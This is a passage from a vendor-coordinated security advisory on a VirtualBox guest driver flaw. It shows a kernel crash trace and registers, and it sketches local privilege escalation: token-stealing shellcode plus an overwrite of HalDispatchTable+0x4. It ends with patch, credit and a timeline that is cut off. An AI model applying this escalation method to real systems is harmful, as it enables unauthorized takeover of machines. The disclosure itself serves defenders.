0001 nt!KeBugCheckEx+0x1b f824aa20 804e172b 0001 nt!MmAccessFault+0x6f5 f824aa20 804eca3b 0001 nt!KiTrap0E+0xcc f824aaf0 804ecaba ffa74248 f824ab3c f824ab30 nt!IopCompleteRequest+0x92 f824ab40 806f5c0e f824ab58 nt!KiDeliverApc+0xb3 f824ab40 806f00b3 f824ab58 hal!HalpApcInterrupt2ndEntry+0x31 f824abcc 804e546c ffa74248 ffa74208 hal!KfLowerIrql+0x43 f824abec 804ecad4 ffa74248 811772d8 nt!KeInsertQueueApc+0x4b f824ac20 faa36123 811772d8 81297558 nt!IopfCompleteRequest+0x1d8 f824ac34 804e3807 008c 008c 806f0070 VBoxGuest+0x1123 f824ac44 80568191 ffa7429c 811772d8 ffa74208 nt!IopfCallDriver+0x31 f824ac58 805770ca 812971a8 ffa74208 811772d8 nt!IopSynchronousServiceTail+0x70 f824ad00 805795e3 0058 nt!IopXxxControlFile+0x611 f824ad34 804de7ec 0058 nt!NtDeviceIoControlFile+0x2a f824ad34 7c90e526 0058 nt!KiFastCallEntry+0xf8 0021fa54 7c90d28a 1d1adc9a 0058 ntdll!KiIntSystemCall+0x6 0021fa58 1d1adc9a 0058 ntdll!ZwDeviceIoControlFile+0xc Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase. ErrCode = 0002 eax=008c ebx=ffa74208 ecx=0023 edx= esi=811eabf0 edi= eip=804eca3b esp=f824aaac ebp=f824aaf0 iopl=0 nv up ei pl nz na po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010202 nt!IopCompleteRequest+0x92: 0008:804eca3b f3a5rep movs dword ptr es:[edi],dword ptr [esi] A write-what-where vulnerability can be leveraged to obtained escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process. 4. Mitigation and Remediation Recommendation The vendor has patched this vulnerability. The patch information is here: http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 04.28.14 - KoreLogic contacts Oracle with vulnerability report and PoC. 04.29.14 - Oracle acknowledges receipt of vulnerability report and PoC. 05.02.14 - Oracle assigns tracking to this vulnerability report and states that it will be patched in the CPU cycle, with credit for the report given to KoreLogic. Oracle also states monthly updates will be provided. 05.22.14 -